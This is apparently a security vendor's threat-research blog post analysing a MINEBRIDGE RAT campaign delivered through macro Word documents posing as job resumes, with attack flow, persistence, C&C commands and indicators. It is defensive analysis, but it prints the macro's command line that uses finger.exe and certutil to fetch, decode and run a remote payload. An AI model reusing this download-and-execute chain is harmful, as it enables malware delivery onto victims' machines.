Concerned about recent PAN-OS and other firewall/VPN CVEs? Take advantage of Zscaler’s special offer today

Zscaler Blog

Get the latest Zscaler blog updates in your inbox

Security Research

Return of the MINEBRIDGE RAT With New TTPs and Social Engineering Lures

February 23, 2021 - 10 min read



In Jan 2021, Zscaler ThreatLabZ discovered new instances of the MINEBRIDGE remote-access Trojan (RAT) embedded in macro-based Word document files crafted to look like valid job resumes (CVs). Such lures are often used as social engineering schemes by threat actors.

MINEBRIDGE buries itself into the vulnerable remote desktop software TeamViewer, enabling the threat actor to take a wide array of remote follow-on actions such as spying on users or deploying additional malware.

We have recently observed other instances of threat actors targeting security researchers with social engineering techniques. While the threat actor we discuss in this blog is not the same, the use of social engineering tactics targeting security teams appears to be on an upward trend.

We also observed a few changes in the tactics, techniques, and procedures (TTPs) of the threat actor since the last instance of MINEBRIDGE RAT was observed in March 2020. In this blog, we provide insights into the changes in TTPs, threat attribution, command-and-control (C&C)  infrastructure, and a technical analysis of the attack flow.

Threat attribution

This attack was likely carried out by TA505, a financially motivated threat group that has been active since at least 2014. TA505 has been previously linked to very similar attacks using MINEBRIDGE RAT. The job resume theme and C&C infrastructure used in this new instance is consistent and in line with these former attacks. Due to the low volume of samples we identified for this new attack, we attribute it to the same threat actor with a moderate confidence level.

Attack flow

Figure 1 below details the attack flow.

Figure 1

Figure 1: Attack flow


Macro technical analysis

For the purpose of technical analysis of the attack flow, we will look at the macro-based Word document with the MD5 hash: f95643710018c437754b8a11cc943348

When the Word document is opened and the macros are enabled, it displays the message: “File successfully converted from PDF” for social engineering purposes.

This message is followed by displaying the decoy document as shown below. Figure 2 shows the contents of the decoy document which resemble a job resume (CV) of a threat intelligence analyst.

Figure 2_1

Figure 2_2


Figure 2: Decoy files using the CV of security researcher for social engineering purposes

The macro code uses basic string obfuscation as shown in Figure 3.

Figure 3

Figure 3: Contents of the obfuscated macro

It constructs the following command line and then executes it using Windows Management Instrumentation (WMI).

Command line: cmd /C finger [email protected] > %appdata%\vUCooUr >> %appdata%\vUCooUr1 && certutil -decode %appdata%\vUCooUr1 %appdata%\vUCooUr.exe &&cmd /C del %appdata%\vUCooUr1 && %appdata%\vUCooUr.exe

This command leverages the Windows utility finger.exe to download encoded content from the IP address: and drops it in the %appdata% directory. The encoded content is decoded using the legitimate Windows utility certutil.exe and executed.

The usage of finger.exe to download the encoded content from the C&C server is one of the major TTP changes by this threat actor.

We see an increase in usage of living-off-the-land binaries (LOLBins) by the threat actor to download, decode, and execute the content in this new instance.

Stage 1: SFX archive

The content decoded using certutil.exe is a self-extracting archive (SFX) which we describe in this section of the blog.

MD5 hash of SFX archive: 73b7b416d3e5b1ed0aa49bda20f7729a

Contents of the SFX archive are shown in Figure 4. It spoofs a legitimate TeamViewer application.


Figure 4

Figure 4: Contents of the SFX archive

Upon execution, this SFX archive drops the legitimate TeamViewer binaries, a few DLLs and some document files.

Execution flow starts with the binary called defrender.exe, which is masked to appear as a Windows Defender binary.


Stage 2 – DLL Side Loading

The dropped binary defrender.exe is a legitimate TeamViewer application version 11.2.2150.0 which is vulnerable to DLL side loading. Upon execution, it loads the msi.dll binary present in the same directory. The msi.dll is the file that performs further malicious activity in the system.

Next, MSI.dll unpacks a shellcode and executes it. The part of code responsible for shellcode unpacking and execution is shown in Figure 5.

Shellcode unpacking

Figure 5: Shellcode unpacking and execution

The shellcode further unpacks another DLL with MD5 hash: 59876020bb9b99e9de93f1dd2b14c7e7 from a hardcoded offset, maps it into the memory, and finally transfers the code execution to its entry point. The unpacked DLL is a UPX-packed binary of MINEBRIDGE RAT.


On unpacking the UPX layer we get the main MINEBRIDGE RAT DLL with MD5 hash: 23edc18075533a4bb79b7c4ef71ff314.

Execution checks

At the very beginning, MINEBRIDGE RAT confirms that the DLL is not executed either via regsvr32.exe or rundll32.exe.

Then it checks the command-line argument and perform the following operations:

  1. If the command-line argument is __RESTART__ then sleep for 5 seconds and perform the operations which are described further.
  2. If the command-line argument is __START__ then it starts a BITS job to download a zip file-based payload and perform the operations which are described further.

Figure 6 shows the relevant command line checks performed by MINEBRIDGE RAT.

Figure 6

Figure 6: Module name and command-line argument check/

BITS Job download

The BITS job downloads a zip file by selecting a random C&C domain from the hardcoded list inside the DLL using path “/~4387gfoyusfh_gut/~3fog467wugrgfgd43r9.bin”. The downloaded DLL is dropped to a hardcoded filename “~f834ygf8yrubgfy4sd23.bin” in the %temp% directory. When the download is completed, the zip file is extracted to “%ProgramData%\VolumeDrive\”,

Figure 7 shows the relevant code section responsible for using bitsadmin to download the payload.

Bits Job Download

Figure 7: BITS job to download the payload file and extract it to %ProgramData%\VolumeDrive\

After performing the above-mentioned checks, it loads the legitimate MSI.dll from %System32% directory to initialize its own Export Address Table. This is done to prevent application crashes when any of the export functions are called. It then generates the BOT_ID after doing some computations with VolumeSerialNumber.

Figure 8

Figure 8: Export address table initialization and BOT_ID generation


API Hooking

MINEBRIDGE RAT then uses the mHook module to hook the following APIs, intercepting function calls in order to avoid accidental exposure of malicious code execution to the user:

  • MessageBoxA         
  • MessageBoxW         
  • SetWindowTextW      
  • IsWindowVisible     
  • DialogBoxParamW     
  • ShowWindow          
  • RegisterClassExW    
  • CreateWindowExW      
  • CreateDialogParamW  
  • Shell_NotifyIconW   
  • ShellExecuteExW      
  • GetAdaptersInfo     
  • RegCreateKeyExW     
  • SetCurrentDirectoryW
  • CreateMutexW        
  • CreateMutexA        
  • CreateFileW         
  • GetVolumeInformationW

Since the last observed instance of this attack in 2020, a few more APIs have been added to the hook list which are highlighted in bold above -- but interestingly, the project path leaked by the mHook module remains unchanged.

C:\users\maximys\desktop\[email protected]\mhook_lib\mhook_lib\disasm-lib\disasm.c

Finally, if all the APIs are hooked successfully, MINEBRIDGE RAT creates three threads in a sequence that perform the following tasks:

1. First thread is responsible for C&C communication and achieving persistence.

2. Second thread gathers when the last input was retrieved to check system idle status.

3. Third thread kills the ShowNotificationDialog process regularly to avoid any notification popups.


Figure 9

Figure 9: Hooks APIs and creates threads



For persistence, MINEBRIDGE RAT creates a LNK file with the name “Windows Logon.lnk” in the startup directory. The LNK file points to the currently executing binary with icon same as “wlrmdr.exe” and description as “Windows Logon”.

LNK File Properties showing Target and Icon Path

Figure 10: LNK file properties showing target path and Icon source


C&C communication

MINEBRIDGE RAT supports the following C&C commands:

●    drun_command
●    rundll_command
●    update_command
●    restart_command
●    terminate_command
●    kill_command
●    poweroff_command
●    reboot_command
●    Setinterval_command

At the time of analysis, we didn’t receive any active response from the C2 server. However, based on the code flow, the communication mechanism seems to be the same as previously reported attack instances. Detailed analysis of C2 communication can be found in this report.


Alternate attack flow

The MINEBRIDGE RAT DLL also has the support to be executed via regsvr32.exe. The malicious code is present inside the DllRegisterServer export. When executed via regsvr32.exe or rundll32.exe, the DllMain routine won’t perform any actions but regsvr32.exe also calls DllRegisterServer export implicitly and, hence, the malicious code inside DllRegisterServer export gets executed.

Interestingly, the check at the very beginning of the code inside DllRegisterServer export verifies that the process name is regsvr32.exe and only then executes the code further.

We didn’t see this code path using regsvr32.exe trigger in the current attack instance but it fits with what has been reported in earlier instances from FireEye and the advisory report with a few changes in filenames and payload directory.

regsvr32.exe download

Figure 11: Payload download from DllRegisterServer export

Zscaler Cloud Sandbox report

Figure 12 shows the sandbox detection for the macro-based document used in the attack.

Figure 11


Figure 12: Zscaler Cloud Sandbox detection


In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators at various levels.








Spearphishing Attachment

Uses doc based attachments with VBA macro


User Execution: Malicious File

User opens the document file and enables the VBA macro 


Registry Run Keys / Startup Folder

Creates LNK file in the startup folder for payload execution


Deobfuscate/Decode Files or Information

Strings and other data are obfuscated in the payloads



Masquerading: Match Legitimate Name or Location

File name used similar to legit Windows Defender binary



Obfuscated Files or Information: Software Packing

Payloads are packed in layers


Hijack Execution Flow: DLL Side-Loading

Uses legit TeamViewer binary with dll-side loading vulnerability


Signed Binary Proxy Execution

Uses finger.exe for encoded payload download and certutil.exe to decode the payload


Input Capture: GUI Input Capture

Captures TeamViewer generated UsedID and Password by hooking GUI APIs


Process Discovery

Verifies the name of parent process


System Information Discovery

Gathers system OS version info


System Owner/User Discovery

Gathers currently logged in Username


Application Layer Protocol: Web Protocols

Uses https for C&C communication


Exfiltration Over C&C Channel

Data is exfiltrated using existing C2 channel



Indicators of compromise

Document hashes




Binary hashes

73b7b416d3e5b1ed0aa49bda20f7729a [SFX Archive]
d12c80de0cf5459d96dfca4924f65144 [msi.dll]
59876020bb9b99e9de93f1dd2b14c7e7 [UPX packed MineBridge RAT]
23edc18075533a4bb79b7c4ef71ff314 [Unpacked MineBridge RAT] 

C&C domains

// Below is a comprehensive list of C&C domains related to this threat actor

Network paths

// The network paths below are accessed by MineBridge RAT either using HTTP GET or POST requests



"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B150 Safari/604.1"

Network data fetch using finger.exe

// Format: username@ip_address

[email protected]

Downloaded files

// Payloads are dropped in following paths


%programdata%\Local Tempary\defrender.exe
%programdata%\Local Tempary\msi.dll
%programdata%\Local Tempary\TeamViewer_Desktop.exe
%programdata%\Local Tempary\TeamViewer_Resource_en.dll
%programdata%\Local Tempary\TeamViewer_StaticRes.dll
{STARTUP}\Windows Logon.lnk

Exfiltrated user and system info

// Format string


The table below summarises the meaning of individual fields.

Field name



BOT-ID of the user


TeamViewer ID of the user


TeamViewer password


Currently logged in user name


Name of the computer


Operating system version


Timeout between requests


form submtited
Thank you for reading

Was this post useful?

dots pattern

Get the latest Zscaler blog updates in your inbox

By submitting the form, you are agreeing to our privacy policy.